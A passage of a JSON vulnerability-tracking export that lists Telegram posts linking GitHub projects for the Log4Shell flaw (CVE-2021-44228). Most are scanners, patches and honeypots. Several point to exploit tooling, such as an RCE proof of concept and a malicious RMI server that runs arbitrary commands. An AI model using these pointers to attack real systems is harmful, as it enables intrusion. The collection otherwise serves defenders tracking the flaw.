"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1393", "content": "#CVE-2021\n#Log4j \nSome tools to help mitigating Apache Log4j 2 CVE-2021-44228\n\nhttps://github.com/madCdan/JndiLookup\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T19:35:06.000000Z"}, {"uuid": "e5bbbffb-013d-4e1d-a9a2-1ff6c1582667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1395", "content": "#CVE-2021\n#log4j\nThis repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228\n\nhttps://github.com/avwolferen/Sitecore.Solr-log4j-mitigation\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T20:30:42.000000Z"}, {"uuid": "03ef75f4-a1ec-407f-9b99-e36506f2fc68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1396", "content": "#CVE-2021\n#Log4shell \nFind Log4Shell CVE-2021-44228 on your system\n\nhttps://github.com/claranet/ansible-role-log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T20:59:01.000000Z"}, {"uuid": "52c77d88-b8aa-4a24-80de-60cf0e8cecce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1397", "content": "#Log4shell \n#CVE-2021\n\nFile transfers using the log4shell vulnerability (CVE-2021-44228)\n\nhttps://github.com/Chelsea486MHz/ftp_over_log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T21:26:01.000000Z"}, {"uuid": "2ffec8c3-3892-4df4-95fa-f113d1c9c1e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1507", "content": "#CVE-2021\n#Log4j \nScans for Log4j versions effected by CVE-2021-44228\n\nhttps://github.com/mergebase/log4j-detector\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T21:00:50.000000Z"}, {"uuid": "500c1105-9d79-4077-9727-021d2c6cf3fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1398", "content": "#CVE-2021\n#Log4shell \n\nLog4Shell A test for CVE-2021-44228\n\nhttps://github.com/yanghaoi/CVE-2021-44228_Log4Shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T21:46:01.000000Z"}, {"uuid": "2f985b91-26f7-408e-8f9c-fcbb5aed42a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1445", "content": "#CVE-2021\n#log4j \n#Log4Shell \nScanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability (CVE-2021-44228)\n\nhttps://github.com/hupe1980/scan4log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T21:16:01.000000Z"}, {"uuid": "14d5dff0-048c-4250-9547-8b033452e973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1518", "content": "#CVE-2021\n#Log4j \nPoC RCE Log4j CVE-2021-4428 para pruebas\n\nhttps://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T11:48:01.000000Z"}, {"uuid": "cb466de6-6936-4ace-91f9-d8de853101e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1519", "content": "#CVE-2021\n#Log4Shell \nAn automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.\n\nhttps://github.com/redhuntlabs/Log4JHunt\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T11:51:01.000000Z"}, {"uuid": "77f51f20-4579-44b4-bd03-50c154a307d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1520", "content": "#CVE-2021\n#Log4j \nCVE-2021-44228 vulnerability in Apache Log4j library\n\nhttps://github.com/Heliferepo/log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T11:54:01.000000Z"}, {"uuid": "3bed6fb2-af51-420f-9eb7-debf975cb3af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1521", "content": "#CVE-2021\n#Log4j2\nLog4j2 Vulnerability (CVE-2021-44228)\n\nhttps://github.com/RenYuH/log4j-lookups-vulnerability\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T11:57:01.000000Z"}, {"uuid": "b1d808b7-bcae-4a17-a47f-f4ab27af8419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1522", "content": "#CVE-2021\n#log4j\nScanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)\n\nhttps://github.com/scheibling/py-log4shellscanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T12:00:48.000000Z"}, {"uuid": "d9391293-9377-4b27-804d-5c797da74dfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1527", "content": "#CVE-2021\n#Log4j \nProvide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself\n\nhttps://github.com/Aschen/log4j-patched\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T21:10:01.000000Z"}, {"uuid": "8c2e0710-de84-47bd-a41b-9a39a8df6654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1529", "content": "#CVE-2021\n#Log4j \nCVE-2021-44228\n\nhttps://github.com/ermohitrathore/detect-log4j-exploitable\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:11:01.000000Z"}, {"uuid": "d040b21a-3083-4fd0-b988-f0b36787df3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1530", "content": "#CVE-2021\n#Log4j \nDocker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)\n\nhttps://github.com/ankur-katiyar/log4j-docker\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:14:01.000000Z"}, {"uuid": "de437fac-ed5a-404b-8d71-9a7aa8eb9a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1531", "content": "#CVE-2021\n#log4j \nThis project will help to test the Log4j CVE-2021-44228 vulnerability.\n\nhttps://github.com/immunityinc/Log4j-JNDIServer\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:35:03.000000Z"}, {"uuid": "84a6bbbe-4f00-4e25-ba50-8c48997a726e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1488", "content": "#CVE-2021\n#Log4j \nHoneypot for CVE-2021-44228\n\nhttps://github.com/wortell/log4j-honeypot\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T11:09:20.000000Z"}, {"uuid": "ad82ce39-4c4a-4b45-b558-3b6b282e0240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1413", "content": "#CVE-2021\n#Log4j \nA singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).\n\nhttps://github.com/Koupah/MC-Log4j-Patcher\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T00:32:25.000000Z"}, {"uuid": "6262b724-0d0e-4b9a-950a-e1c352252416", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1418", "content": "#CVE-2021\n#log4j\n\nlog4j (CVE-2021-44228) Spring web application with vulnerabilities\n\nhttps://github.com/Auddn/ITF-log4shell-Vulnapp\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T09:39:13.000000Z"}, {"uuid": "ce895ebc-9ea0-4fcf-85f7-3d8cebe76043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1419", "content": "#CVE-2021\n#Log4j\nSimple Python 3 script to detect the \\\"Log4j\\\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading\n\nhttps://github.com/Woahd/log4j-urlscanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T09:42:42.000000Z"}, {"uuid": "5e531f9a-71a1-4af1-a6d4-1a074939a120", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1489", "content": "#CVE-2021\n#Log4j \nThis Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\n\nhttps://github.com/roxas-tan/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T11:12:09.000000Z"}, {"uuid": "28a63157-39e9-4fbc-9c06-dbb349f6fed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1490", "content": "#CVE-2021\n#Log4Shell \nlog4shell (CVE-2021-44228) scanning tool\n\nhttps://github.com/shamo0/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T11:21:34.000000Z"}, {"uuid": "810dcb2e-3b82-4e11-a771-4e12647bc3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1491", "content": "#CVE-2021\n#Log4j\nCVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.\nhttps://github.com/Joefreedy/Log4j-Windows-Scanner\n@BlueRedTeam", "creation_timestamp": "2021-12-16T11:43:50.000000Z"}, {"uuid": "6f2f3508-4b15-4387-a236-4e2ea0e2733f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1492", "content": "#CVE-2021\n\nPatch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2\n\nhttps://github.com/Glease/Healer\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T13:18:38.000000Z"}, {"uuid": "bdaa8895-5832-4345-919a-213ec00fa3f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1493", "content": "#CVE-2021\n#Log4Shell \nLocal Bytecode Scanner for Log4JShell Vulnerability (CVE-2021-44228)\n\nhttps://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T13:22:03.000000Z"}, {"uuid": "7c81b216-2406-49f6-bda7-f4b4c3c6a52d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1494", "content": "#CVE-2021\n#Log4Shell \nSimple webapp that is vulnerable to Log4Shell (CVE-2021-44228)\n\nhttps://github.com/korteke/log4shell-demo\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T14:03:08.000000Z"}, {"uuid": "04ff722e-78a8-49ea-b33c-60e562648b56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1495", "content": "#CVE-2021\n#Log4j \nBurp extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\n\nhttps://github.com/DXC-StrikeForce/Burp-Log4Shell-Active-Scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T14:03:36.000000Z"}, {"uuid": "d622c782-b4a9-4a81-9b06-1ecb94f5f32c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1496", "content": "#CVE-2021\n#Log4j \nBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046\n\nhttps://github.com/freskimo/Burp-Log4j-HammerTime\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:36:42.000000Z"}, {"uuid": "d5a7cf90-b5db-4ed8-84a4-fd487ce0f78f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1439", "content": "#CVE-2021\n#Log4Shell \nThe vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell.\n\nhttps://github.com/ReynerGonzalez/Security-Log4J-Tester\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T15:54:57.000000Z"}, {"uuid": "0557b644-2948-43a2-90de-38b1e84af8d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1497", "content": "#CVE-2021\n#log4j \nSimple bash script to scan multiples url for log4j vulnerability (CVE-2021-44228)\n\nhttps://github.com/Gyrfalc0n/scanlist-log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:39:24.000000Z"}, {"uuid": "5292321c-8502-4a26-a8bd-eebc7e135f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1440", "content": "#CVE-2021\n\nCVE-2021-44228\n\nhttps://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T15:57:58.000000Z"}, {"uuid": "cd9e98e8-502c-41f5-9426-642343e1e63c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1441", "content": "#CVE-2021\n\nCVE-2021-44228 on Podman\n\nhttps://github.com/ahmad4fifz/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T16:43:37.000000Z"}, {"uuid": "0d9ef824-114a-4976-8a77-751fcb54015a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1442", "content": "#CVE-2021\n#Log4j \nRepo containing all info, scripts, etc. related to CVE-2021-44228\n\nhttps://github.com/wortell/log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T17:05:10.000000Z"}, {"uuid": "a11401bf-fb13-4da3-b59a-541329a955c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1498", "content": "#CVE-2021\n#Log4j\n\nA simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)\n\nhttps://github.com/MeterianHQ/log4j-vuln-coverage-check\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:42:26.000000Z"}, {"uuid": "bdc1337f-5b72-461c-9101-5e4c847dd45f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1444", "content": "#Log4j \n#CVE-2021\n\nInternal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228\n\nhttps://github.com/BinaryDefense/log4j-honeypot-flask\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T21:13:01.000000Z"}, {"uuid": "f54fa727-74bf-49af-badc-c37afe6e9393", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1499", "content": "#CVE-2021\n#Log4Shell \nA honeypot for the Log4Shell vulnerability (CVE-2021-44228).\n\nhttps://github.com/thomaspatzke/Log4Pot\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:45:01.000000Z"}, {"uuid": "0f5a3785-9c29-4c1e-be62-bb3ba6b6af9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1500", "content": "#CVE-2021\n#log4j2 \n\nBasic Vulnerable Spring Boot Application to Test CVE-2021-44228\n\nhttps://github.com/recanavar/vuln_spring_log4j2\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:48:01.000000Z"}, {"uuid": "94dc5424-f23c-4ae0-a112-b7c72f3b6ee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1515", "content": "#CVE-2021\n#Log4Shell \nTest exploit of CVE-2021-44228\n\nhttps://github.com/wajda/log4shell-test-exploit\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T11:39:36.000000Z"}, {"uuid": "cb067063-b1a8-4bed-a86d-13bdb978ec3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1524", "content": "#CVE-2021\n#Log4j \nThe script \\\"Py3-detect-log4j-12.2021.py\\\" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228.\n\nhttps://github.com/nx6110a5100/Py3-detect-log4j-12.2021\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T16:53:52.000000Z"}, {"uuid": "c9650e36-c417-407d-a46b-6319f215d81c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1501", "content": "#CVE-2021\n#log4j2 \nScanner local em Python para localizar e identificar vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco com an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\n\nhttps://github.com/andalik/log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:51:01.000000Z"}, {"uuid": "3dd5db6f-1733-4c56-ac80-4c61809e8c7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1503", "content": "#CVE-2021\n#log4Shell \n\nLog4Shell CVE-2021-44228 Vulnerability Scanner and POC\n\nhttps://github.com/gyaansastra/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T17:02:56.000000Z"}, {"uuid": "f19342b2-4811-40d3-afce-b8d5e2017346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1504", "content": "#CVE-2021\n#log4j2\nScanner local em Python para varredura e localiza\u00e7\u00e3o de vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco, contemplando an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\n\nhttps://github.com/andalik/log4j-filescan\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T17:03:26.000000Z"}, {"uuid": "0c26fdcf-3ed6-46d6-b270-420703548763", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/thebugbountyhunter/5859", "content": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228\n\nhttps://github.com/fullhunt/log4j-scan", "creation_timestamp": "2021-12-13T09:38:03.000000Z"}, {"uuid": "ce92df46-7a74-4ae4-8336-05d9f78c21ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1517", "content": "#CVE-2021\n#Log4Shell \nA lab demonstration of the log4shell vulnerability: CVE-2021-44228\n\nhttps://github.com/obscuritylabs/log4shell-poc-lab\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T11:45:01.000000Z"}, {"uuid": "10971f35-3181-45c1-bf54-328b61118c71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1351", "content": "#CVE-2021\n#Log4j\nCVE-2021-44228 test demo\n\nhttps://github.com/fireflyingup/log4j-poc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T16:55:45.000000Z"}, {"uuid": "e623b07c-0aab-4ba0-886e-4520a5e7abb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1352", "content": "#CVE-2021\nChecking for vulnerability CVE-2021-44228.\n\nhttps://github.com/greymd/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T17:17:12.000000Z"}, {"uuid": "c5708f13-2702-4116-bf0b-986f00138dc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1353", "content": "#CVE-2021\nAn evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228\n\nhttps://github.com/Hydragyrum/evil-rmi-server\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T18:40:20.000000Z"}, {"uuid": "8f570b3d-7591-40dd-8c1c-e86ba7167e45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1354", "content": "#CVE-2021\n#Log4j \n\nSpring Boot Log4j - CVE-2021-44228 Docker Lab \n\nhttps://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T18:41:39.000000Z"}, {"uuid": "89014706-e775-4273-a0da-049a0a6573ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1355", "content": "#CVE-2021\n#Log4j2\nIP addresses exploiting recent log4j2 vulnerability CVE-2021-44228 \n\nhttps://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T18:45:49.000000Z"}, {"uuid": "1556e240-447c-4b10-ac10-6f985af7ead5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1356", "content": "#Log4j \n#CVE-2021\nCheck list of URLs against Log4j vulnerability CVE-2021-44228\n\nhttps://github.com/OlafHaalstra/log4jcheck\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T21:03:50.000000Z"}, {"uuid": "96ba42e4-2eb4-4ab2-b532-576cc2d06ea7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1357", "content": "#CVE-2021\n#log4j\nAn  agent to hotpatch the log4j RCE from CVE-2021-44228.\n\nhttps://github.com/corretto/hotpatch-for-apache-log4j2\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T22:46:14.000000Z"}, {"uuid": "5c6a1348-b0fc-461d-af07-fecdbbd3059d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1358", "content": "#CVE-2021\n#Log4Shell\nLog4Shell CVE-2021-44228\n\nhttps://github.com/cyberxml/log4j-poc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T23:12:28.000000Z"}, {"uuid": "ce168b8a-ecd2-48f8-a9e2-af9050e08cd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1371", "content": "#CVE-2021\n\na fast check, if your server could be vulnerable to CVE-2021-44228\n\nhttps://github.com/rubo77/log4j_checker_beta\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T10:29:01.000000Z"}, {"uuid": "cc9a5dc9-396b-4b4b-b044-5b24c5e69f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1372", "content": "#CVE-2021\n#Log4Shell \n#Log4j\nJava agent that disables Apache Log4J's JNDI Lookup. Fixes CVE-2021-44228, aka 